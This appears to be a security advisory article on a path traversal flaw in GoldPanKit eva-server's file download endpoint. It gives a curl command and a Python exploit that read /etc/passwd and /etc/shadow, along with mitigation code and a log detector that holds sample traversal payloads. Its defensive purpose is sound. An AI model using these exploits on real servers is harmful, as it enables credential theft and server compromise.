CVE-2024-54909 exposes a critical security issue in GoldPanKit eva-server v4.1. This exclusive article breaks down what the flaw is, why it matters, how it can be exploited, and how you can avoid becoming a victim. Simple explanations, real exploit code, and all the references you’ll need.

What is CVE-2024-54909?

This vulnerability is an arbitrary file download issue found in GoldPanKit eva-server version 4.1. It involves the /api/resource/local/download endpoint, where an attacker can abuse the path query parameter to download files outside the intended directory.

Normally, users should only be able to download approved files, but with this vulnerability an attacker can retrieve any file the server process can read, such as system configuration files, web server credentials, or tokens, leading to serious data leaks or even full server compromise.

Vulnerable Endpoint

POST /api/resource/local/download

Parameter: path (controls which file to download)

Problem: The application fails to sanitize the path parameter, so attackers can perform path traversal (using ../ to break out of the intended folder) and grab any file on the server.

Here’s a real-world example using curl; just substitute the target server’s address and port:

curl -X POST "http://target-server:port/api/resource/local/download" \
  -H "Content-Type: application/json" \
  -d '{"path": "../../../../etc/passwd"}' --output passwd.txt

This downloads /etc/passwd, the Linux account database, but it could be any file readable by the server process.

Python Exploit Example

import requests

target = "http://target-server:port"
vulnerable_endpoint = "/api/resource/local/download"
malicious_path = "../../../../etc/shadow"

body = {
    "path": malicious_path
}

response = requests.post(target + vulnerable_endpoint, json=body)

if response.status_code == 200:
    with open('shadow.txt', 'wb') as f:
        f.write(response.content)
    print('[+] File successfully downloaded!')
else:
    print('[-] Exploit failed. Status code:', response.status_code)

Original References

- NVD - CVE-2024-54909 Detail
- GoldPanKit eva-server official page
- Common Path Traversal Attacks

Mitigation

- Upgrade: Check GoldPanKit’s site for patches or updates addressing CVE-2024-54909.

- Sanitize Input: If you must provide file download capability, restrict the path parameter to a safe folder, strip out ../, and deny access to files outside it.

- Web Application Firewall (WAF): Employ rules to block suspicious download requests.

- Monitor Logs: Watch for unusual file download attempts, especially those containing .. in the path parameter.

Example Mitigation (in Python)

import os

def safe_join(base_dir, user_path):
    # Resolve both the base directory and the requested file to absolute,
    # symlink-free paths so that "../" segments and absolute user paths are
    # collapsed before the check (normpath alone leaves a relative base_dir
    # relative, and the original prefix test would then always fail).
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # Compare whole path components rather than a string prefix: a plain
    # startswith() would accept "/srv/files2" as being inside "/srv/files".
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("Invalid path: outside the download directory")
    return candidate
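The WAF and log-monitoring advice above needs concrete matching logic to be useful. The following is an added example, not code from this article or from GoldPanKit: it sweeps constructed application log lines for requests to the download endpoint whose path parameter escapes the download folder, normalizing percent-encoding and backslashes before matching so that a rule keyed on the literal string "../" is not the only thing standing between the attacker and the file system. The log field names (ts, src, uri, body) are assumptions for this example.

```python
import json
import re
from urllib.parse import unquote

# Constructed log lines in a JSON-per-line shape; the field names are assumptions
# for this example, not eva-server's real log format. The "path" parameter of this
# POST endpoint is only visible in logs that record the request body.
SAMPLE_LOGS = [
    '{"ts":"2025-02-06T22:15:38Z","src":"203.0.113.7","uri":"/api/resource/local/download","body":{"path":"reports/q1.pdf"}}',
    '{"ts":"2025-02-06T22:15:40Z","src":"198.51.100.23","uri":"/api/resource/local/download","body":{"path":"../../../../etc/passwd"}}',
    '{"ts":"2025-02-06T22:15:41Z","src":"198.51.100.23","uri":"/api/resource/local/download","body":{"path":"%2e%2e%2f%2e%2e%2fetc%2fshadow"}}',
    '{"ts":"2025-02-06T22:15:42Z","src":"198.51.100.23","uri":"/api/resource/local/download","body":{"path":"..\\\\..\\\\windows\\\\win.ini"}}',
    '{"ts":"2025-02-06T22:15:43Z","src":"192.0.2.9","uri":"/api/resource/local/download","body":{"path":"/etc/hostname"}}',
    '{"ts":"2025-02-06T22:15:44Z","src":"192.0.2.10","uri":"/api/resource/list","body":{}}',
]

DOWNLOAD_URI = "/api/resource/local/download"
DOTDOT_SEGMENT = re.compile(r"(^|/)\.\.(/|$)")  # a ".." path component


def is_traversal_attempt(raw_path: str) -> bool:
    """True if the requested path would leave the intended download folder.
    Percent-encoding (up to two layers) and backslashes are normalized first,
    so the check sees the path the way the file system would."""
    path = raw_path
    for _ in range(2):
        path = unquote(path)
    path = path.replace("\\", "/")
    if "\x00" in path or path.startswith("/"):
        return True  # embedded NUL or an absolute path: never a legitimate download
    return DOTDOT_SEGMENT.search(path) is not None


def find_suspicious_downloads(log_lines):
    """Return (timestamp, source_ip, raw_path) for every flagged download request."""
    hits = []
    for line in log_lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the sweep
        if rec.get("uri") != DOWNLOAD_URI:
            continue
        raw_path = str(rec.get("body", {}).get("path", ""))
        if is_traversal_attempt(raw_path):
            hits.append((rec["ts"], rec["src"], raw_path))
    return hits
```

Feeding the flagged tuples into a per-source counter gives the repeated-attempt signal an alert threshold should key on; a single client sending several escaping paths in seconds is the pattern to page on.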

Conclusion

CVE-2024-54909 in GoldPanKit eva-server is a powerful example of how unsanitized user input can put an entire server at risk. File download endpoints must strictly control what files users can access. If you run GoldPanKit eva-server, upgrade now and audit your endpoints!

Stay safe — always validate user input and keep your systems patched.


*This article is exclusive and independently written for info/sec professionals by security researchers.*

Timeline

Published on: 02/06/2025 22:15:38 UTC
Last modified on: 02/12/2025 15:15:15 UTC